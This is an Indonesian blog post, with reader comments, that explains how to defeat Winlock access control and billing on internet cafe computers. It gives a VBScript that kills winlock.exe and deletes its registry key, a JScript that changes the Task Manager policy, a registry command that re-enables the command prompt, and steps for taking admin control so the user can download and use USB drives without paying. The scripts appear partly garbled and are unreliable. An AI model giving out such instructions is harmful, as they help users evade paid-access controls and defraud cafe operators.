6

Cara mematikan billing warnet

Cara mematikan billing warnet Diulas oleh Pembacasekitar . Artikel tentang Cara mematikan billing warnet Okey, Pasti semua udah tau winlock itu apa kan ? Kalo belum tau search aja di google yah, hihihihi. Ya intinya sih winlock itu digunakan buat mengurangi akses Penilaian: 5

Okey, Pasti semua udah tau winlock itu apa kan ? Kalo belum tau search aja di google yah, hihihihi. Ya intinya sih winlock itu digunakan buat mengurangi akses kita terhadap komputer tersebut. Misalkan, gak bisa download atau gak bisa buka Drive di komputer tersebut. Disini saya cuma mau sharing aja pengalaman saya menjadikan diri sebagai admin winlock tersebut.

OK. Yang dibutuhin cuma

  1. Notepad / Wordpad.

Pikirkan gimana caranya buat buka notepad tersebut. Banyak caranya. Dari sound device pun bisa buka notepad. Dan langganan saya buat buka notepad/wordpad sih pake Lagu Gratisan dari windows itu loh, yang di sample music.

Ya tinggal save as >> pilih desktop >> terus save dengan ekstensi .txt / .doc deh.. Ok langsung aj ya, udah dibuka notepad/wordpad? Usahakan cek dulu ada deepfreeze atau kagak. Kalo ada deepfreeze kan bisa ngilangin jejak deh dengan restart komputer. Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.

Copy script ini:

strComputer = .
Set objWMIService = GetObject(winmgmts: _
& {impersonationLevel=impersonate}!\\ & strComputer & \root\cimv2³)
Set colProcessList = objWMIService.ExecQuery _
(Select * from Win32_Process Where Name = ˜winlock.exe™)
For Each objProcess in colProcessList
objProcess.Terminate()

Next

Const HKEY_CLASSES_ROOT = &H80000000

strComputer =

Set objRegistry=GetObject(winmgmts:\\ & _
strComputer & \root\default:StdRegProv)

strKeyPath = CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID
strValueName = ID

objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName

Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya. Sebenarnya itu 2 script yang dijadikan 1 karena kesamaan ekstensi.

Keterangan:

  • Script 1 : Buat kill winlock.exe, karena biasanya task manager di disable kan ?
  • Script 2 : Buat delete key ID Winlock di regedit yang berada di CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID

Sekarang step 2. (AKTIFKAN TASK MANAGER)

Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt). Kalo taskmanager / startnya gak didisable, bisa langsung aja buka command prompt di accesories. Dan coba saja windows+R, kalau bisa, ya langsung aja copy script aktifkan command promptnya dibawah.

/// Program Ramping Mengamankan Task Manager
// Nama Program: tsk_mgr.js
function prakata(pesan)
{
natan.popup(pesan,0,Menjaga Task Manager);
}
function catat(harga)
{
natan.RegWrite(HKCU\\Software\\microsoft\\Windows \\CurrentVersion+\\Policies\\System\\DisableTaskMgr,harga,REG_DW ORD);
}
var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;
natan = WScript.CreateObject(WScript.Shell);
pesan = Menu Pilihan :\n\n
Klik [Yes] untuk Nonaktifkan Task Manager.\n
Klik [No] untuk Aktifkan Task Manager.\n
Klik [Cancel] untuk Keluar.\n\n
[+] http:www.netrix.web.id [+]\n\n
NonAktifkan Task Manager sekarang?
tanya = natan.popup(pesan,0,Menjaga Task Manager,vbYesNoCancel);
if (tanya == vbYes)
{
harga=1;
pesan=Task Manager DiNonAktifkan! visit http://www.netrix.web.id;
catat(harga);
prakata(pesan);
}
else if (tanya == vbNo)
{
harga=0;
pesan=Task Manager DiAktifkan! visit http://www.netrix.web.id;
catat(harga);
prakata(pesan);
}
else
{
pesan=visit http://www.www.netrix.web.id;
prakata(pesan);
}

billing warnet

Save dengan ekstensi .js dan jalankan, lalu pilih NO buat mengaktifkan task manager. Lalu buka task manager (ctrl+alt+del) >> Pilih tab users >> Klik menu File >> Pilih Run >> Lalu copy paste script ini di situ.

REG add HKCU\Software\Policies\micr*soft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

Ini fungsinya buat mengaktifkan command prompt. Lalu dengan cara yang sama, ketik cmd untuk membuka command prompt. Setelah masuk command prompt, Silahkan cari dimana folder winlock berada. Misalkan berada di folder C:\program files\winlockpro

  • Ketik C: lalu enter Ketik cd program files lalu enter
  • Ketik cd winlockpro lalu enter
  • Dan ketik winlock.exe lalu enter

TADA.. Sekarang anda winlock baru pun sudah berjalan, dan silahkan shutdown/kill winlock.exe yang baru biar gak mengganggu. Sekarang Anda bebas mau ngapain aja. Mau Download/Colok USB/dll pokoknya bisa deh, kan udah jadi admin.

Perhatian: Ini hanyalah sebagai edukasi saja, saya tidak bertanggung jawab atas hal apapun yang terjadi.

Kategori: Komputer, Tips & Trik Label: , ,

cara mematikan billing warnet cara mematikan billing mematikan billing mematikan billing warnet cara menonaktifkan billing cara mematikan biling cara mematikan winlock cara billing menonaktifkan billing cara mematikan komputer di warnet billing warnet cara billing warnet cara menyetop billing cara mematikan billing di warnet cara mematikan komputer warnet cara membuka billing warnet cara mematikan warnet cara membuka winlock mematikan biling kegunaan winlock

Baca Juga

Share This Post

Get Updates

6 Komentar di "Cara mematikan billing warnet"

  1. bee says:

    pake SAMADAV and ANSAV juga bisa bro….

  2. tHanks bAnget iNfonYa sOb,,
    sAngat bErmanfaat untuk menjadi hacker bIllIng waRnet,,
    hehehe,,
    nTi akan sAy cOba di wArnet deKat rUmah sAya sOb,,

  3. Aldo says:

    Thanx bgt bro infonya?

    Tp kalo misalnya os nya pke linux gmana?

  4. conan says:

    hmmm… itu bisa kalo os nya xp. kalo pake win 7 gagal sob.. file vbs nya gak bisa di buka..

  5. aliyah aremanita cayank derbyromero says:

    maksud nya apa ya aku ngak tau

    ada 2 yang ngak ngak ku ketahui dan 100 yang bingungkan

    klu yang mengerti silakan coba kayak nya ada yang ngak ngerti klu

    ada yang mau njawab comment ku datang aja ke fb ku : aliyah

    aremanita cayank derbyromero

  6. erica says:

    gAcG faHam brO

Tulis Komentar

Kirim Komentar

© 2014 Netrix blog's. All rights reserved. XHTML / CSS Valid.
Di desain oleh Ryan Adhi Nugroho.